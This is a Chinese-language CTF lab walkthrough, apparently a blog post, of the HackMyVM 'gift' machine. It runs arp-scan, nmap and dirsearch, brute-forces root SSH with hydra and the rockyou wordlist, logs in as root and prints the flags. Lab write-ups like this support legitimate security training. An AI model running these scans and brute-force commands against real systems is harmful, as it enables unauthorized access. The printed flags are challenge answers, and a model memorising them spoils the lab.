本文详细描述了在虚拟机环境中使用arp-scan,nmap,dirsearch,hydra等工具进行信息收集、端口扫描、服务识别以及Web目录搜索的过程,最终通过SSH连接并尝试获取root权限。
目录
信息收集
arp
┌─[root@parrot]─[~]
└──╼ #arp-scan -l
Interface: enp0s3, type: EN10MB, MAC: 08:00:27:16:3d:f8, IPv4: 192.168.9.102
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.106 08:00:27:a3:06:17 PCS Systemtechnik GmbH
Ending arp-scan 1.10.0: 256 hosts scanned in 1.975 seconds (129.62 hosts/sec). 6 res
nmap
端口扫描
┌─[root@parrot]─[~/HackMyVM]
└──╼ #nmap -p- 192.168.9.106 --min-rate 10000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-13 10:33 GMT
Stats: 0:00:25 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 93.62% done; ETC: 10:33 (0:00:02 remaining)
Nmap scan report for 192.168.9.106
Host is up (0.00077s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:A3:06:17 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 45.15 seconds
服务版本信息收集
┌─[✗]─[root@parrot]─[~/HackMyVM]
└──╼ #nmap -sC -sV -p 22,80 192.168.9.106 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-13 10:38 GMT
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 10:38 (0:00:06 remaining)
Nmap scan report for 192.168.9.106
Host is up (0.00058s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey:
| 3072 2c:1b:36:27:e5:4c:52:7b:3e:10:94:41:39:ef:b2:95 (RSA)
| 256 93:c1:1e:32:24:0e:34:d9:02:0e:ff:c3:9c:59:9b:dd (ECDSA)
|_ 256 81:ab:36:ec:b1:2b:5c:d2:86:55:12:0c:51:00:27:d7 (ED25519)
80/tcp open http nginx
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:A3:06:17 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.07 seconds
WEB
dirsearch
┌─[root@parrot]─[~/HackMyVM]
└──╼ #dirsearch -u http://192.168.9.106/
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/HackMyVM/reports/http_192.168.9.106/__24-04-13_11-15-10.txt
Target: http://192.168.9.106/
[11:15:10] Starting:
Task Completed
很简单??
hydra
既然80端口没有信息,我们直接爆破22端口得了!
┌─[roolting@parrot]─[/root/HackMyVM]
└──╼ $hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.9.106
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-13 11:15:59
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.9.106:22/
[STATUS] 146.00 tries/min, 146 tries in 00:01h, 14344256 to do in 1637:29h, 13 active
[22][ssh] host: 192.168.9.106 login: root password: simple
[STATUS] 4781466.33 tries/min, 14344399 tries in 00:03h, 3 to do in 00:01h, 10 active
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-13 11:19:19
ssh连接
┌─[roolting@parrot]─[/root/HackMyVM]
└──╼ $ssh root@192.168.9.106
root@192.168.9.106's password:
IM AN SSH SERVER
gift:~# id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
gift:~#
get root
gift:~# cd /root
gift:~# ls -al
total 20
drwx------ 2 root root 4096 Sep 24 2020 .
drwxr-xr-x 22 root root 4096 Sep 18 2020 ..
-rw------- 1 root root 79 Apr 13 11:23 .ash_history
---------- 1 root root 12 Sep 24 2020 root.txt
-rw-rw---- 1 root root 12 Sep 24 2020 user.txt
gift:~# cat *.txt
HMVtyr543FG
HMV665sXzDS
扫一扫
579
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
